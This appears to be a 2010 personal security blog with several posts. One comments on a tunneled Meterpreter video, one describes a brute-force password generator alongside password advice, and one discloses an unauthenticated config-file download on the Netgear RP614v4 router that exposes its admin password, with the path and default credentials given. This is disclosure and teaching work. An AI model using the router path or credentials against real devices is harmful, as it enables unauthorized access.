Persistent SSH Tunneled Meterpreter from PaulDotCom on Vimeo.
http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html
Nifty method, however I would argue that storing the password in clear text for your ssh server probably isn’t the best idea, and if you’re forced to do this, then the account that has to have the exposed password, should be severely limited in privileges.
Keep up the good work PaulDotCom.. 🙂
More to come..
Passwords, who doesn’t have at least one password that they can think of? We rely on them dearly for our sake of privacy and keeping information confidential. However, passwords can be guessed via dictionary attacks and even by brute forcing.
Brute forcing passwords is not the most efficient way of gaining access to an account during an audit or pentest, say in the case of network authentication.
Despite traditional ways of bruting passwords by using one single core (or even multi-core) processor, which isn’t the most efficient way, distributed computing is now the way of the future and is more of a realistic way to perform brute force attacks.
One great example of this currently in practice (at a small cost). Individuals now have access to bruting WPA passwords via:
http://www.wpacracker.com/
I decided to write a program in C, as just a mere fun task. The program will generate password combinations in letter character ranges from 4 characters long to 10 characters long. I chose this range, due to reading this:
http://www.schneier.com/essay-144.html
My program (which is located here:)
http://zitstif.no-ip.org/c/bruteme.txt
will cover 94.92% of passwords according to this study, however there is one caveat, I did leave out the ‘space’ character, in the array of characters.
Bear in mind, that the longer the password, the longer it takes to come up with the combination. I wrote this just as more of a simple PoC.
Users who want to keep their accounts secure, that rely on password authentication should keep this in mind:
*Â Â Use long passwords that you can remember
*Â Â Don’t write down your password or store your password in a clear text file.
* Â Don’t use the same password over and over
*Â Â Do not share your password with others
*Â Â If you can, use special characters, but make sure you can remember your password.
*Â Â Do not use easily guessable passwords
*Â Â Be very careful of what secret questions you use if you ever have to reset your forgotten password
*Â Â Try to change your passwords on a regular interval
*Â Â Do not do any remote authentication in public wireless networks
*Â Â Have multiple e-mail accounts, one that is for purchasing things online, and one for other matters
You might ask yourself, “Why should I not do any remote authentication in public wireless networks?”. I advise this because most public wireless networks I’ve encountered, have taken no precautions to prevent ARP poisoning. If you use VPNs or SSH tunneling, you’ll mitigate your risks, but I would still advise to not do authenticating in public networks.
One possible risk of relying on SSH tunneling, is giving away your server’s public IP (via means of ‘side channel attacks’). This could potentially make your server a target for various other attacks. Along with that, there is also the risk of SSH downgrade attacks. (I believe I’ve posted a link to this before: http://openmaniak.com/ettercap_filter.php)
Also for possible attacks / risks on VPN networks, have a look at this:
http://my.safaribooksonline.com/1931841810/ch10lev1sec260#X2ludGVybmFsX0ZsYXNoUmVhZGVyP3htbGlkPTE5MzE4NDE4MTAvMjUxJmltYWdlcGFnZT0yNTE=
As for multiple e-mail accounts, I believe this is a great precaution for the case of if you have one account breached. This way the attacker won’t have access to all the other accounts to reset passwords. However, this depends on how you have your e-mail accounts set up, so do be careful.
More to come…
Website/Company: http://zitstif.no-ip.org
E-mail: zitstif[at]gmail.com
Name: Kyle Young
Device: Netgear RP614v4
Firmware version: v1.1.2_09.01
Firmware release date: November 2009
HTTP service: Boa HTTPd 0.93.15
Exploit release date: Wednesday March 24, 2010
Default router credentials:
username: admin
password: password
Scope: Local/Remote
Vulnerability:
The Netgear RP614v4 is susceptible to an end user making a request for the netgear.cfg file which is located at:
http://[RouterIP]/vgn/jsp/netgear.cfg
This file, is a plain text ASCII file that contains the router’s password at line 216, which looks similar to this:
http_passwd=myvulnerablepassword
You don’t have to authenticate to obtain this file at all.
The qualm with this exploit is that, it works in the LAN that the router is on, or even remotely over a WAN, that is if the remote administration
option is enabled and the default port for this is 8080.
PoC: http://zitstif.no-ip.org/rp614v4/rp614v4exploit.txt
Additional notes:
After discovering this vulnerability, I’ve noticed with other routers that have http based administration, is that you can make requests for config files without authenticating. However, this does not always work and at times the config file is obfuscated.
From my experience, most of the config files for routers are in a binary format and can be viewed with a program like ‘bvi‘. At times, you can view credentials to the device and also PPPoE credentials.
I’m reporting this vulnerability to securityfocus.com, due to the lack of support on Netgear’s end.
